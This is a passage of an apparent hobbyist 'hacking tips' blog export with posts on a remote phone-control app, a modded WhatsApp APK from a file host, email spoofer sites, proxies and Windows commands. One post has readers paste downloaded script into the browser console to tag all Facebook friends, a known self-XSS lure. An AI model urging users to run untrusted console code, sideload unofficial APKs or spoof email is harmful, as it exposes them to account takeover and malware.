SO all these things made possible by phone so must have small security for care<br />
<br />
HERES' THE SECRET <br />
<br />
Download an APP name call ANDORID LOST <br />
<br />
Download or install app => <a href="https://play.google.com/store/apps/details?id=com.androidlost&hl=en" target="_blank">Click on me :) </a><br />
<br />
***********<br />
how to download apk file of android => <a href="http://prasoon-nigam.blogspot.in/2013/03/download-android-applicatoins-files.html" target="_blank">click on me :))</a><br />
**********************<br />
<br />
so after installing this app you need<br />
1) a gmail account<br />
2) synchronize that gmail account in your phone <br />
3) you can also install help of play store present in your phone <br />
<br />
Features of ANDROID LOST app<br />
when your phone is lost what all you can do help of this app<span style="background-color: white;"></span><span style="color: white;"> </span><br />
<br />
*read message<br />
** read call history <br />
*** raise alarm <br />
**** get mobile location <br />
***** get imei no. <br />
****** get photo of rear and front camera <br />
******* lock phone change pic<br />
******** delete everything u have in your data sd card<br />
********* make phone silent and vibrate<br />
and much more more u want :: u can read ever thing in detail over here <a href="http://www.androidlost.com/" target="_blank">click on me :) </a><br />
<br />
NOW WHAT YOU HAVE TO DO AFTER INSTALLING THIS APP ??<br />
<br />
after installing this <br />
<br />
* synchronize your phone with gmail id <br />
** go to the website <a href="http://www.androidlost.com/" target="_blank">Android lost </a>or <a href="http://www.androidlost.com/" target="_blank">Click on me :)</a> and sign in the website and track your mobile simple <br />
just 3 steps and you can trace your mobile phone <br />
<br />
Here is the Video tutorial :: How to use Android lost app <br />
<br />
<a href="https://www.youtube.com/watch?v=NU6oK94HHag" target="_blank">Click on me :) </a><br />
Installing tutorial => <a href="https://www.youtube.com/embed/gcTZbreowJM?ps=play&vq=large&rel=0&autohide=1&showinfo=0&autoplay=1&authuser=0" target="_blank">Click on me :)</a><br />
<a href="https://www.youtube.com/watch?v=JZToutMg5UI" target="_blank">How to use it Detail Click on me :)</a><br />
<br />
SO keep your phone SAFE <br />
Just one app helps you alot so no need of taking help and finding your self in a question "Now what i DO ?" <br />
<br />
Be Safe and be Ethical <br />
Pprasoon Nigam<br />
Security Expert </div>
Pprasoonhttp://www.blogger.com/profile/03035156066634387335noreply@blogger.com0tag:blogger.com,1999:blog-5075788214695190708.post-17043403800159158232014-04-24T20:01:00.005-07:002014-08-13T20:45:40.461-07:00How to use two WhatsApp in one Android device <div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div style="text-align: left;">
<span style="font-size: large;">How to use two WhatsApp on one Android phone</span></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<span style="font-size: large;">or</span></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<span style="font-size: large;">Use two WhatsApp without rooting up mobile phone </span></div>
<div style="text-align: left;">
<br />
<span style="font-size: small;">many of u thinking am i joking or kidding, is it really true if yes then tell me how?<br /><br />Why two whatsapp <br /><br />* to make urself different <br />** to keep some people away from ur personal no. <br />*** want to have personal no. with personal whatsapp for ur lover <br />**** just to show yeah i can do this i have two whats app <br />****** <span style="color: red;">mobile is not rooted up (no rooting is needed) so u can safe ur warranty and gurrantey </span><br /><br />now how to do it that's the important part <br /><br />HERE'S THE SECRET </span><br />
<span style="font-size: small;">*********************</span><br />
<span style="font-size: small;">tag all ur friend in comment in one click => <a href="http://prasoon-nigam.blogspot.in/2013/11/steps-to-follow-for-tagging-all-friends.html" target="_blank">Click on me :))</a></span><br />
<span style="font-size: small;">protect ur computer with virus and trojans => <a href="http://prasoon-nigam.blogspot.in/2013/11/protect-your-computer-laptopmobile.html" target="_blank">Click on me :))</a></span><br />
<span style="font-size: small;">***********************************************<br /><br />first of all back up all ur chats of whats app <br /><br />Steps <br /><br />Go to setting => then to chat setting and click on backup option <br />after backing up ur whatsapp<br /><br />*** go to setting to the apps setting and uninstall ur whatsapp <br /><br />**** when u have unistalled then go to storage => phone storage and find WhatsApp folder <br /><br /><span style="color: red;">rename ur WhatsApp folder to WhatsAppold </span><br />** as if u have renamed ur whatsapp now install a new whatsapp from playstore open it up and put ur new number ( mobile number in it) then continue and agree all the terms do all that stuff; u do to register in whatsapp but remember with <span style="color: lime;">ur new phone no.</span><br /><br />::: ** NOW HERE THE IMP PART FOR THE REGISTER FOR SECOND WHATSAPP NO.<br /><br />now go to storage and into phone storage </span></div>
<span style="font-size: small;">=>>> now rename ur whatsappold folder to OGWhatsApp</span><br />
<span style="font-size: small;"><br /> <span style="color: red;"> Rename "WhatsAppold => OGWhatsapp"</span><br /><br />not download this apk file names "<span style="color: lime;">OGWhatsApp</span>" <br /><br />to download OGWhatsApp => <a href="http://www.filefactory.com/file/27yv9e863v8x/OGWhatsApp%20v2.11.209.apk" target="_blank">Click on me :) </a><br /><br /><br />** Now install the OGWhatsapp help of apk file i have given u and then register ur self with ur <span style="color: lime;">prvious no. (or the old no.) </span>and here you go with two whatsapp with two different no.</span><br />
<br />
************<br />
wifi hacking GUI software in backtrack => <a href="http://prasoon-nigam.blogspot.in/2012/08/wifi-hacking-with-gerix-in-backtrack.html" target="_blank">Click on me :))</a><br />
cracking hash codes with backtrack => <a href="http://prasoon-nigam.blogspot.in/2012/04/cracking-hash-backtrack-5.html" target="_blank">Click on me :))</a><br />
************************<br />
<br />
<span style="font-size: large;">Summary </span><br />
<br />
*.* WhatsApp have ur new no. registered <br />
*.* OGWhatsApp have ur old no. registered<br />
*.* if u want u can do vice versa but u will mess up with backup data </div>
Pprasoonhttp://www.blogger.com/profile/03035156066634387335noreply@blogger.com1tag:blogger.com,1999:blog-5075788214695190708.post-71591404623065927722013-11-26T02:05:00.001-08:002014-08-13T21:05:06.309-07:00Steps To Follow For tagging All Friends In A single Click <div dir="ltr" style="text-align: left;" trbidi="on">
Steps To Follow For tagging All Friends In A single Click :<br />
<br />
HERE'S THE SECRET <br />
<br />
this code or trick basically work on google chrome :: you can <br />
<br />
********<br />
How to close Ports => <a href="http://prasoon-nigam.blogspot.in/2013/08/how-to-close-ports.html" target="_blank">Click on me :)</a><br />
105 Useful Websites => <a href="http://prasoon-nigam.blogspot.in/2013/09/list-of-105-useful-websites-for-every.html" target="_blank">Click on me :)</a><br />
**********************************************<br />
<br />
<span style="font-size: large;">Post Your Status.</span><br />
<br />
Now click on time of your status so that it will open in new tab along <br />
<br />
with your status link.<br />
<br />
Now press CTRL+SHIFT+J , now you can see a new window, just move onto <br />
<br />
CONSOLE tab.<br />
<br />
<span style="font-size: large;">download below given link and paste it in CONSOLE tab .</span><br />
<br />
Download the code => <a href="http://www.filefactory.com/file/jo9ihvenkbz/code%20for%20tagging%20friends.txt" target="_blank">Click on me :))</a><br />
<br />
<br />
<u><span style="color: red;">for example IMPORTANT</span></u><br />
this the code starting <br />
(<br />
function x__0(){return window.ActiveXObject?new ActiveXObject<br />
<br />
("Msxml2.XMLHTTP"):new XMLHttpRequest}function get_friends(){var<br />
<br />
e=x__0();e.open("GET","/ajax/typeahead/first_degree.php?__a=1&filter<br />
)<br />
<br />
<br />
*_* now remove the gaps <br />
<br />
(<br />
function x__0(){return window.ActiveXObject?new ActiveXObject <br />
("Msxml2.XMLHTTP"):new XMLHttpRequest}function get_friends(){var <br />
e=x__0();e.open("GET","/ajax/typeahead/first_degree.php?__a=1&filter<br />
) <br />
<br />
like this and you are done :: thank you enjoy<br />
<br />
<br />
After pasting above script, now finally press ENTER and enjoy.<br />
<br />
vollaa You're Done !! Now just wait <br />
<br />
thanks & Regards from<br />
<a href="http://www.hackingartz.com/" target="_blank">www.hackingartz.com</a></div>
Pprasoonhttp://www.blogger.com/profile/03035156066634387335noreply@blogger.com0tag:blogger.com,1999:blog-5075788214695190708.post-72982253179213929552013-11-06T22:07:00.001-08:002013-11-06T22:07:22.931-08:00 Top 107 Command Prompt<div dir="ltr" style="text-align: left;" trbidi="on">
Top 107 Command Prompt<br /><br />HERE's THE SECRET <br /><br /><br />1. Accessibility Controls - access.cpl<br />2. Accessibility Wizard - accwiz<br />3. Add Hardware Wizard - hdwwiz.cpl<br />4. Add/Remove Programs - appwiz.cpl<br />5. Administrative Tools - control admintools<br />6. Automatic Updates - wuaucpl.cpl<br />7. Bluetooth Transfer Wizard - fsquirt<br />8. Calculator - calc<br />9. Certificate Manager - certmgr.msc<br />10. Character Map - charmap<br />11. Check Disk Utility - chkdsk<br />12. Clipboard Viewer - clipbrd<br />13. Command Prompt - cmd<br />14. Component Services - dcomcnfg<br />15. Computer Management - compmgmt.msc<br />16. Control Panel - control<br />17. Date and Time Properties - timedate.cpl<br />18. DDE Shares - ddeshare<br />19. Device Manager - devmgmt.msc<br />20. Direct X Troubleshooter - dxdiag<br />21. Disk Cleanup Utility - cleanmgr<br />22. Disk Defragment - dfrg.msc<br />23. Disk Management - diskmgmt.msc<br />24. Disk Partition Manager - diskpart<br />25. Display Properties - control desktop<br />26. Display Properties - desk.cpl<br />27. Dr. Watson System Troubleshooting Utility - drwtsn32<br />28. Driver Verifier Utility - verifier<br />29. Event Viewer - eventvwr.msc<br />30. Files and Settings Transfer Tool - migwiz<br />31. File Signature Verification Tool - sigverif<br />32. Findfast - findfast.cpl<br />33. Firefox - firefox<br />34. Folders Properties - control folders<br />35. Fonts - control fonts<br />36. Fonts Folder - fonts<br />37. Free Cell Card Game - freecell<br />38. Game Controllers - joy.cpl<br />39. Group Policy Editor (for xp professional) - gpedit.msc<br />40. Hearts Card Game - mshearts<br />41. Help and Support - helpctr<br />42. HyperTerminal - hypertrm<br />43. Iexpress Wizard - iexpress<br />44. Indexing Service - ciadv.msc<br />45. Internet Connection Wizard - icwconn1<br />46. Internet Explorer - iexplore<br />47. Internet Properties - inetcpl.cpl<br />48. Keyboard Properties - control keyboard<br />49. Local Security Settings - secpol.msc<br />50. Local Users and Groups - lusrmgr.msc<br />51. Logs You Out Of Windows - logoff<br />52. Malicious Software Removal Tool - mrt<br />53. Microsoft Chat - winchat<br />54. Microsoft Movie Maker - moviemk<br />55. Microsoft Paint - mspaint<br />56. Microsoft Syncronization Tool - mobsync<br />57. Minesweeper Game - winmine<br />58. Mouse Properties - control mouse<br />59. Mouse Properties - main.cpl<br />60. Netmeeting - conf<br />61. Network Connections - control netconnections<br />62. Network Connections - ncpa.cpl<br />63. Network Setup Wizard - netsetup.cpl<br />64. Notepad - notepad<br />65. Object Packager - packager<br />66. ODBC Data Source Administrator - odbccp32.cpl<br />67. On Screen Keyboard - osk<br />68. Outlook Express - msimn<br />69. Paint - pbrush<br />70. Password Properties - password.cpl<br />71. Performance Monitor - perfmon.msc<br />72. Performance Monitor - perfmon<br />73. Phone and Modem Options - telephon.cpl<br />74. Phone Dialer - dialer<br />75. Pinball Game - pinball<br />76. Power Configuration - powercfg.cpl<br />77. Printers and Faxes - control printers<br />78. Printers Folder - printers<br />79. Regional Settings - intl.cpl<br />80. Registry Editor - regedit<br />81. Registry Editor - regedit32<br />82. Remote Access Phonebook - rasphone<br />83. Remote Desktop - mstsc<br />84. Removable Storage - ntmsmgr.msc<br />85. Removable Storage Operator Requests - ntmsoprq.msc<br />86. Resultant Set of Policy (for xp professional) - rsop.msc<br />87. Scanners and Cameras - sticpl.cpl<br />88. Scheduled Tasks - control schedtasks<br />89. Security Center - wscui.cpl<br />90. Services - services.msc<br />91. Shared Folders - fsmgmt.msc<br />92. Shuts Down Windows - shutdown<br />93. Sounds and Audio - mmsys.cpl<br />94. Spider Solitare Card Game - spider<br />95. SQL Client Configuration - cliconfg<br />96. System Configuration Editor - sysedit<br />97. System Configuration Utility - msconfig<br />98. System Information - msinfo32<br />99. System Properties - sysdm.cpl<br />100. Task Manager - taskmgr<br />101. TCP Tester - tcptest<br />102. Telnet Client - telnet<br />103. User Account Management - nusrmgr.cpl<br />104. Utility Manager - utilman<br />105. Windows Address Book - wab<br />106. Windows Address Book Import Utility - wabmig<br />107. Windows Explorer - explorer </div>
Pprasoonhttp://www.blogger.com/profile/03035156066634387335noreply@blogger.com0tag:blogger.com,1999:blog-5075788214695190708.post-38187379209061811212013-11-03T20:57:00.003-08:002013-11-03T20:57:36.187-08:00Protect your computer /laptop/mobile phones from hacker viruses and trojans<div dir="ltr" style="text-align: left;" trbidi="on">
Protect your computer /laptop/mobile phones from hacker viruses and Trojans<br /><br />HERE's the SECRET<br /><br />1) <u>Windows Updates</u>: Even the best offerings from computer giants have not been able to completely fight off the attempts of rouge developers to break in. In this situation, it has become almost a necessity for users to update their Windows-based system, on a regular basis. An update daily, weekly or even monthly is going to speed up the system and help it counter attacks on its security thereby decreasing the probability of it, being infected by worms and viruses. Desktop monitoring by hackers is indeed a grand problem. <br /><br />2) <u>Software updates</u>: Like the Windows, applications also have to be updated with the latest version. You need to check regularly for wear and tear in the software that your system runs. Web browsers and web-based programs have to be upgraded constantly so hackers do not get their hands on the private and confidential data, stored in your system. <br /><br />3) <u>Antivirus Software</u>: If your system is being connected to the internet regularly and you run without antivirus software on it, it is almost impossible for hackers not to get attracted to it. In case you do not have antivirus software, get your hands on one as soon as possible. If you already have one, upgrade it to its latest version and check if the settings are properly defined. <br /><br />4) <u>Anti-spyware Software</u>: Even though the digital situation looks pretty grim, it still isn’t as bad as the days when Bonzi Buddy and Cool Websearch made PC users have nightmares. This is because of anti-spyware software that have shielded the tech world from malicious attacks on the security. <br /><br />5) <u>Swap your Windows-based system for a Macintosh</u>: The whole tech world knows that Mac’s OS X has the largest number of limitations as compared to other computer operating systems. The truth is that most hackers do not bother breaking into a Mac. This is the reason Mac still makes space for itself in the list of secure computer operating systems, despite its shortcomings. <br /><br />6) <u>Hacker-Controlled websites</u>: Usually sites that offer free downloads,online games etc. are operated by hackers. It is almost given that you avoid dangerous places especially if you have valuables on your PC. The same goes for the mechanical world. Steer clear of sites that look suspicious or require you to download something which is not needed. <br /><br />7) <u>Data Backup</u>: Create a backup for all the important data that you have on your system. Apart from hackers and system crashers, other mishaps may spell out death for your hard drives. A tech storm can easily sweep away every bit of data in your system. It’s always better to be safe than sorry. </div>
Pprasoonhttp://www.blogger.com/profile/03035156066634387335noreply@blogger.com0tag:blogger.com,1999:blog-5075788214695190708.post-57933906655903355222013-10-31T07:38:00.002-07:002013-10-31T07:38:51.106-07:00Top 10 Proxy WebSites To Unblock Any Site<div dir="ltr" style="text-align: left;" trbidi="on">
If you do not want to go through installation of Proxy softwares then anonymous browsing with proxy websites is the best option for you.<br /><br />Here's the SECRET<br /><br /> best free Proxy websites of 2013 that will let you surf internet anonymously and securely.<br /><br /><br />1. 000FreeProxy => <a href="http://000freeproxy.com/" target="_blank">000freeproxy</a><br />
<br />2. kkProxy => <a href="http://kkproxy.com/" target="_blank">kkproxy</a><br /><br />3. MyAddr => <a href="http://www.myaddr.com/" target="_blank">myaddr</a><br /><br />4. RX Proxy => <a href="http://www.rxproxy.com/" target="_blank">RX Proxy</a><br /><br />5. AnonyMouse =><a href="http://anonymouse.org/anonwww.html" target="_blank">anonymouse</a><br /><br />6. Zend2 => <a href="http://www.zend2.com/" target="_blank">zend2</a><br /><br />7. NewIPNow =><a href="http://www.newipnow.com/" target="_blank">newipnow</a><br /><br />8. KProxy => <a href="http://www.kproxy.com/" target="_blank">kproxy</a><br /><br />9. Mega Proxy => <a href="https://www.megaproxy.com/freesurf/" target="_blank">megaproxy</a><br /><br />10. AD Free Proxy => <a href="http://www.adfreeproxy.com/" target="_blank">adfreeproxy</a></div>
Pprasoonhttp://www.blogger.com/profile/03035156066634387335noreply@blogger.com0tag:blogger.com,1999:blog-5075788214695190708.post-86207936107202826562013-09-17T13:17:00.003-07:002013-09-17T13:17:38.700-07:0010 Free Online Tools Must Know<div dir="ltr" style="text-align: left;" trbidi="on">
10 Free Online Tools Must Know<br />
<br />
1. Emkei’s Mailer (http://emkei.cz/) : Email Spoofer<br />
<br />
2. GuerillaMail (http://guerrillamail.com/) : Email Spoofer - better than emkei's mailer<br />
<br />
3. Cloud9 (http://cloud9.io/) : Your online IDE for editing code from any PC<br />
<br />
4. Ideone.com (http://ideone.com/) : Test your code, almost all languages.<br />
<br />
5. TextMechanic (http://textmechanic.com/) : Format your text, all at one site<br />
<br />
6. Crypo (http://crypo.in.ua/tools/) : Compilation of all encryption/decryption tools on one place.<br />
<br />
7. WebSniffer (http://web-sniffer.net/) : Check what are the headers/ HTTP return of a request<br />
<br />
8. Ping.eu (http://ping.eu/) : pinging / speed test / dns lookup<br />
<br />
9. Plus.im (https://plus.im/) : All IM, online<br />
<br />
10. Mail2Web (https://mail2web.com/login/) : Accessing POP3 emails online</div>
Pprasoonhttp://www.blogger.com/profile/03035156066634387335noreply@blogger.com3tag:blogger.com,1999:blog-5075788214695190708.post-74446807152483014982013-09-02T11:38:00.000-07:002013-09-02T11:38:16.445-07:00List Of 105 Useful Websites for Every Reader<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<span style="font-size: large;">1. screenr.com – Record movies of your desktop and send them straight to YouTube.<br /><br />2. bounceapp.com – For capturing full length screenshots of web pages.<br /><br />3. Goo. gl – Shorten long URLs and convert URLs into QR codes.<br /><br />4. untiny.me – Find the original URLs that’s hiding behind a short URLs.<br /><br />5. localti.me – Know more than just the local time of a city.<br /><br />6.copypastecharacter.com– Copy-paste special characters that aren’t on your keyboard.<br /><br />7. topsy.com –A better search engine for twitter.<br /><br />8. fb.me/AppStore –Search iOS apps without launching iTunes.<br /><br />9. iconfinder.com –The best place to find icons of all sizes.<br /><br />10. office.com –Download templates, clip art and images for your Office documents.<br /><br />11. woorank.com –everything you wanted to know about a website.<br /><br />12. virustotal.com –Scan any suspicious file or email attachment for viruses.<br /><br />13. wolframalpha.com– Gets answers directly without searching .<br /><br />14.printwhatyoulike.com– Print web pages without the clutter.<br /><br />15. joliprint.com –Reformats news articles and blog content as a<br />newspaper.<br /><br />16. isnsfw.com – When you wish to share a NSFW page but with a warning.<br /><br />17. eggtimer.com – A simple online timer for your daily needs.<br /><br />18. coralcdn.org – If a site is down due to heavy traffic, try accessing it through coral CDN.<br /><br />19. random.org – Pick random numbers, flip coins, and more.<br /><br />20. mywot.com –Check the trust level of any website .<br /><br />21. viewer.zoho.com –Preview PDFs and Presentations directly in the browser.<br /><br />22. tubemogul.com –Simultaneously upload videos to YouTube and other video sites.<br /><br />23. truveo.com – The best place for searching web videos.<br /><br />24. scr.im – Share your email address online without worrying about spam.<br /><br />25. spypig.com – Now get read receipts for your email.<br /><br />26. sizeasy.com –Visualize and compare the size of any product.<br /><br />27. whatfontis.com –quickly determine the font name from an image.<br /><br />28. fontsquirrel.com –A good collection of fonts – free for personal and commercial use.<br /><br />29. regex.info – Find data hidden in your photographs .<br /><br />30. tineye.com – This is like an online version of Google Googles.<br /><br />31. iwantmyname.com– Helps you search domains across allTLDs.<br /><br />32. tabbloid.com –Your favorite blogs delivered as PDFs.<br /><br />33. join. me – Share your screen with anyone over the web.<br /><br />34. onlineocr.net –Recognize text from scanned PDFs and images – see other OCR tools.<br /><br />35. flightstats.com –Track flight status at airports worldwide.<br /><br />36. wetransfer.com –For sharing really big files online.<br /><br />37. pastebin.com – A temporary online clipboard for your text and code snippets.<br /><br />38.polishmywriting.com –Check your writing for spelling or grammatical errors.<br /><br />39.awesomehighlighter.com– Easily highlight the important parts of a web page.<br /><br />40. typewith.me –Work on the same document with multiple people.<br /><br />41.whichdateworks.com –Planning an event? Find a date that works for all.<br /><br /><br />42. everytimezone.com– A less confusing view of the world time zones.<br /><br /><br />43. warrick.cs.odu.edu– You’ll need this when your bookmarked web pages are deleted.<br /><br />44. gtmetrix.com – The perfect tool for measuring your site performance online.<br /><br />45. imo.im – Chat with your buddies on Skype,Facebook, GoogleTalk, etc from one place.<br /><br />46.translate.google.com– Translate web pages,PDFs and Office documents.<br /><br />47. youtube.com/leanback – Sit back and enjoy YouTube videos in full-screen mode.<br /><br />48. similarsites.com –Discover new sites that are similar to what you like already.<br /><br /><br />49. wordle.net – Quicksummarize long pieces of text with tag clouds.<br /><br />50. bubbl.us – Create mind-maps, brainstorm ideas in the browser.<br /><br />51. kuler.adobe.com –Get color ideas, also extract colors from photographs.<br /><br />52. followupthen.com– Setup quick reminders via email itself.<br /><br />53. lmgtfy.com – When your friends are too lazy to use Google on their own.<br /><br />54. tempalias.com –Generate temporary email aliases, better than disposable email.<br /><br />55. pdfescape.com –Lets you can quickly edit PDFs in the browser itself.<br /><br />56. faxzero.com – Send an online fax for free– see more fax services.<br /><br />57. feedmyinbox.com –Get RSS feeds as an email newsletter.<br /><br />58. isendr.com –Transfer files without uploading to a server.<br /><br />59. tinychat.com –Setup a private chatroom in micro-seconds.<br /><br />60. privnote.com –Create text notes that will self-destruct after being read.<br /><br />61. flightaware.com –Live flight tracking service for airports worldwide.<br /><br /><br />62. boxoh.com – Track the status of any shipment on Google Maps – alternative.<br /><br />63. chipin.com – When you need to raise funds online for an event or a cause.<br /><br />64.downforeveryoneorjustme.com – Is your favorites really offline?<br /><br />65. example.com – This website can be used as an example in documentation.<br /><br />66.whoishostingthis.com –Find the web host of any website.<br /><br />67. google.com/history– Found something on Google but can’t remember it now?<br /><br />68.errorlevelanalysis.com– Find whether a photo is real or aphotoshopped one.<br /><br />69. google.com/dictionary – Get word meanings, pronunciations and usage examples.<br /><br />70.urbandictionary.com –Find definitions of slangs and informal words.<br /><br />71. seatguru.com –Consult this site before choosing a seat for your next flight.<br /><br />72. sxc.hu – Download stock images absolutely free.<br /><br />73.download.com.np-Get all softwares.<br /><br />74. wobzip.org – Unzip your compressed files online.<br /><br />75. vocaroo.com –Record your voice with a click.<br /><br />76. scribblemaps.com– Create custom Google Maps easily.<br /><br />77. buzzfeed.com –Never miss another Internet meme or viral video.<br /><br />78. alertful.com –Quickly setup email reminders for important events.<br /><br />79.encrypted.google.com– Prevent your ISP and boss from reading your search queries.<br /><br />80. formspring.me –You can ask or answer personal questions here.<br /><br />81. snopes.com – Find if that email offer you received is real or just another scam.<br /><br />82. typingweb.com –Master touch- typing with these practice sessions.<br /><br />83. mailvu.com – Send video emails to anyone using your webcam.<br /><br />84. ge.tt – Quickly send a file to someone,they can even preview it before downloading.<br /><br />85. timerime.com –Create timelines with audio, video and images.<br /><br />86. stupeflix.com –Make a movie out of your images, audio and video clips.<br /><br />87. aviary.com/myna –An online audio editor that lets you record and remix audio clip.<br /><br />88. noteflight.com –Print music sheets, write your own music online (review).<br /><br />89.disposablewebpage.com– Create a temporary web page that self-destruct.<br /><br />90. namemytune.com– When you need to find the name of a song.<br /><br />91. homestyler.com –Design from scratch or re-model your home in3d.<br /><br />92. snapask.com – Use email on your phone to find sports scores, read Wikipedia, etc.<br /><br />93. teuxdeux.com – A beautiful to-do app that resembles a paper diary.<br /><br />94. livestream.com –Broadcast events live over the web, including your desktop screen.<br /><br />95. bing.com/images –Automatically find perfectly-sized wallpapers for mobiles.<br /><br />96. historio.us –Preserve complete web pages with all the formatting.<br /><br />97. dabbleboard.com –Your virtual whiteboard.<br /><br />98. whisperbot.com –Send an email without using your own account.<br /><br />99. sumopaint.com –An excellent layer- based online image editor.<br /><br />100. lovelycharts.com– Create flowcharts, network diagrams, Sitemaps, etc.<br /><br />101. nutshellmail.com– Get your Facebook and Twitter streams in your Inbox.<br /><br />102.The Hype Machine -Web-based music discovery site based on the music posted to blogs http://hypem.com/<br /><br />103.SimpleWash -A site to help you clean up old content you may not want to show on your social media profiles anymore (currently Facebook only, Twitter is coming soon) SimpleWash™<br /><br />104.ListenToYouTube.com -Converts YouTube videos to mp3sYouTube to MP3 Converter - Fast, Free -ListenToYouTube.com<br /><br />105.PushBullet -Easily send notes, links,lists, files, etc. to your Android phone</span></div>
Pprasoonhttp://www.blogger.com/profile/03035156066634387335noreply@blogger.com1tag:blogger.com,1999:blog-5075788214695190708.post-13841112533059122162013-08-21T12:45:00.000-07:002013-08-21T12:47:13.439-07:00Notification to readers <div dir="ltr" style="text-align: left;" trbidi="on">
Our team Pprasoon nigam Blogspot team is sorry for the new updates that has been not made from last few months <br />
The Reason is because we our working on something which is very SECRET <br />
<br />
but this Secret will be reveled soon <br />
<br />
you will be getting more benefits of hacking and plus more easy way to learn and study and practice on it (hacking) ...... so please have patience and keep in touch with us any help get to our FaceBook account <br />
<br />
to go to my account ===> <a href="https://www.facebook.com/pprasoon.nigam" target="_blank">Facebook Pprasoon nigam</a><br />
<br />
Till then be safe and stay connected <br />
<br />
Regards <br />
Pprasoon nigam blogspot team </div>
Pprasoonhttp://www.blogger.com/profile/03035156066634387335noreply@blogger.com0tag:blogger.com,1999:blog-5075788214695190708.post-84388913313061203942013-08-21T12:38:00.003-07:002013-08-21T12:39:34.104-07:00How To Close Ports<div dir="ltr" style="text-align: left;" trbidi="on">
<h2>
How To Close Ports</h2>
<span style="background-color: white;"><span></span></span><br />
So i've been looking for a while on just how to close a port on a computer. I simply<br />
couldn't find a way. Well, i finally found it. This'll only work for windows users (unless<br />
your unix version OS has netsh).<br />
it's actually quite simple. here's the command for it:<br />
<br />
netsh firewall delete portopening TCP portnumber<br />
it's that simple. Simply go to START -> RUN -> and type in that command up there,<br />
and it'll close it for you.<br />
<br />
or, you can also open up command prompt (START -> RUN -> CMD) and type in "netsh"<br />
without the quotes to get to your windows firewall settings.<br />
however, since i'm such a nice guy, i wrote it all out in a vbs script for you so that it's<br />
automatically runable. as well as a batch script. so here you are follows:<br />
=============================<br />
.VBS Script<br />
set ss = createobject("wscript.shell")<br />
set ws = wscript<br />
dim PORT<br />
PORT = InputBox("Enter the port you wish to close:")<br />
ss.run "netsh.exe"<br />
ws.sleep 1000<br />
ss.sendkeys "firewall delete portopening TCP " & PORT<br />
ss.sendkeys "{enter}"<br />
ws.sleep 500<br />
'ss.sendkeys "exit"<br />
'ss.sendkeys "{enter}"<br />
================================<br />
.BAT Script<br />
@echo off<br />
title Port Closer<br />
echo Port Closer><br />
echo.<br />
set /p port=Type the port number you wish to close here:<br />
netsh firewall delete portopening TCP %port%<br />
msg /w * Port %port% has been closed.<br />
exit</div>
Pprasoonhttp://www.blogger.com/profile/03035156066634387335noreply@blogger.com0tag:blogger.com,1999:blog-5075788214695190708.post-10914335952583144002013-04-28T10:08:00.000-07:002013-04-28T10:09:53.902-07:0020 little tricks and hacks for all Windows O.S<div dir="ltr" style="text-align: left;" trbidi="on">
<!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
o\:* {behavior:url(#default#VML);}
w\:* {behavior:url(#default#VML);}
.shape {behavior:url(#default#VML);}
</style>
<![endif]--><span style="font-size: x-large;"><br /></span>
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:View>Normal</w:View>
<w:Zoom>0</w:Zoom>
<w:TrackMoves>false</w:TrackMoves>
<w:TrackFormatting/>
<w:PunctuationKerning/>
<w:ValidateAgainstSchemas/>
<w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
<w:IgnoreMixedContent>false</w:IgnoreMixedContent>
<w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
<w:DoNotPromoteQF/>
<w:LidThemeOther>EN-US</w:LidThemeOther>
<w:LidThemeAsian>X-NONE</w:LidThemeAsian>
<w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript>
<w:Compatibility>
<w:BreakWrappedTables/>
<w:SnapToGridInCell/>
<w:WrapTextWithPunct/>
<w:UseAsianBreakRules/>
<w:DontGrowAutofit/>
<w:SplitPgBreakAndParaMark/>
<w:DontVertAlignCellWithSp/>
<w:DontBreakConstrainedForcedTables/>
<w:DontVertAlignInTxbx/>
<w:Word11KerningPairs/>
<w:CachedColBalance/>
</w:Compatibility>
<m:mathPr>
<m:mathFont m:val="Cambria Math"/>
<m:brkBin m:val="before"/>
<m:brkBinSub m:val="--"/>
<m:smallFrac m:val="off"/>
<m:dispDef/>
<m:lMargin m:val="0"/>
<m:rMargin m:val="0"/>
<m:defJc m:val="centerGroup"/>
<m:wrapIndent m:val="1440"/>
<m:intLim m:val="subSup"/>
<m:naryLim m:val="undOvr"/>
</m:mathPr></w:WordDocument>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
DefSemiHidden="true" DefQFormat="false" DefPriority="99"
LatentStyleCount="267">
<w:LsdException Locked="false" Priority="0" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Normal"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="heading 1"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/>
<w:LsdException Locked="false" Priority="39" Name="toc 1"/>
<w:LsdException Locked="false" Priority="39" Name="toc 2"/>
<w:LsdException Locked="false" Priority="39" Name="toc 3"/>
<w:LsdException Locked="false" Priority="39" Name="toc 4"/>
<w:LsdException Locked="false" Priority="39" Name="toc 5"/>
<w:LsdException Locked="false" Priority="39" Name="toc 6"/>
<w:LsdException Locked="false" Priority="39" Name="toc 7"/>
<w:LsdException Locked="false" Priority="39" Name="toc 8"/>
<w:LsdException Locked="false" Priority="39" Name="toc 9"/>
<w:LsdException Locked="false" Priority="35" QFormat="true" Name="caption"/>
<w:LsdException Locked="false" Priority="10" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Title"/>
<w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/>
<w:LsdException Locked="false" Priority="11" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/>
